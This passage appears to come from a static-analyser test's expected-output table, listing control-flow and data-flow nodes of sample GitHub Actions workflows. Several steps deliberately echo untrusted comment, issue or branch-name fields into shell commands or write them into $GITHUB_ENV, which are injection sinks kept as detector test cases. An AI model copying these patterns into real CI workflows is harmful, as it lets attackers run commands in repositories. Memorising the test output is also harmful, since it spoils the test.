.github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| 